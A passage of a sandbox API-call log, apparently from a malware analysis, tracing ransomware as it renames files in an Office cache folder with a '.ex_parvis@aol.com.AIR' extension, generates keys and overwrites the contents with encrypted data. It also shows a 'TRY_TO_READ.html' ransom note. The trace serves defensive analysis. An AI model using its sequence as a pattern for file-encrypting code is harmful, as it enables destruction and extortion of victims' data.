hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.236] GetLastError () returned 0x0 [0143.236] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.236] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.236] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.236] GetLastError () returned 0x0 [0143.236] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0143.237] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3290a0 [0143.237] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0143.237] GetLastError () returned 0x0 [0143.237] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9721ce70, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0143.237] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0143.237] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0143.237] GetLastError () returned 0x0 [0143.237] FindNextFileW (in: hFindFile=0x35e118, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9721ce70, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385cb0 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.237] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.237] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.237] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.237] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", dwFileAttributes=0x80) returned 1 [0143.241] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 75 [0143.241] GetProcessHeap () returned 0x2e0000 [0143.241] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0143.241] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" [0143.241] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR" [0143.241] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.243] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.243] GetProcessHeap () returned 0x2e0000 [0143.243] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.243] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3584) returned 1 [0143.243] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe00 [0143.244] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.244] GetProcessHeap () returned 0x2e0000 [0143.244] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.244] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.244] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.248] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.248] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.248] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe00) returned 0x3a7410 [0143.248] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe00) returned 0x3a8218 [0143.248] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.248] ReadFile (in: hFile=0x49c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0xe00, lpOverlapped=0x0) returned 1 [0143.248] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-3584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.248] WriteFile (in: hFile=0x49c, lpBuffer=0x3a8218*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a8218*, lpNumberOfBytesWritten=0x2acf9c8*=0xe00, lpOverlapped=0x0) returned 1 [0143.248] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.248] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a8218 | out: hHeap=0x2e0000) returned 1 [0143.248] CloseHandle (hObject=0x49c) returned 1 [0143.249] GetProcessHeap () returned 0x2e0000 [0143.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0143.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385cb0 | out: hHeap=0x2e0000) returned 1 [0143.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385c08 | out: hHeap=0x2e0000) returned 1 [0143.249] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385c08 [0143.249] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.249] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.249] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.249] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.249] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0143.250] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0143.250] GetProcessHeap () returned 0x2e0000 [0143.250] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x3a7410 [0143.250] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" [0143.250] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0143.250] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.254] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.254] GetProcessHeap () returned 0x2e0000 [0143.254] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.254] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9352) returned 1 [0143.254] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2488 [0143.254] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.254] GetProcessHeap () returned 0x2e0000 [0143.254] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.254] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.254] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.257] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.257] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.257] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2488) returned 0x3a7410 [0143.257] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2488) returned 0x3a98a0 [0143.257] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.257] ReadFile (in: hFile=0x49c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x2488, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x2488, lpOverlapped=0x0) returned 1 [0143.258] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.258] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.258] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", dwFileAttributes=0x80) returned 1 [0143.259] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 73 [0143.259] GetProcessHeap () returned 0x2e0000 [0143.259] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x3a7410 [0143.260] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" [0143.260] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR" [0143.260] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.261] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.262] GetProcessHeap () returned 0x2e0000 [0143.262] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.262] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=67190) returned 1 [0143.262] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10676 [0143.262] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.262] GetProcessHeap () returned 0x2e0000 [0143.262] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.262] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.262] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.264] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0143.264] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0143.264] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10676) returned 0x3a7410 [0143.264] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10676) returned 0x3b7a90 [0143.265] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.265] ReadFile (in: hFile=0x49c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x10676, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x10676, lpOverlapped=0x0) returned 1 [0143.268] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-67190, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.268] WriteFile (in: hFile=0x49c, lpBuffer=0x3b7a90*, nNumberOfBytesToWrite=0x10676, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b7a90*, lpNumberOfBytesWritten=0x2acf9c8*=0x10676, lpOverlapped=0x0) returned 1 [0143.268] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0143.268] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b7a90 | out: hHeap=0x2e0000) returned 1 [0143.268] CloseHandle (hObject=0x49c) returned 1 [0143.270] GetProcessHeap () returned 0x2e0000 [0143.270] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.270] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0143.270] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0143.270] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385b60 | out: hHeap=0x2e0000) returned 1 [0143.270] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385ab8 | out: hHeap=0x2e0000) returned 1 [0143.270] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385ab8 [0143.270] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0143.270] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0143.270] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0143.270] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0143.270] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", dwFileAttributes=0x80) returned 1 [0143.271] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 74 [0143.271] GetProcessHeap () returned 0x2e0000 [0143.271] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363a50 [0143.271] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" [0143.271] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR" [0143.271] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0143.274] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0143.274] GetProcessHeap () returned 0x2e0000 [0143.274] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0143.274] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=27195) returned 1 [0143.274] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6a3b [0143.274] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0143.274] GetProcessHeap () returned 0x2e0000 [0143.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0143.274] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0143.275] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0143.276] 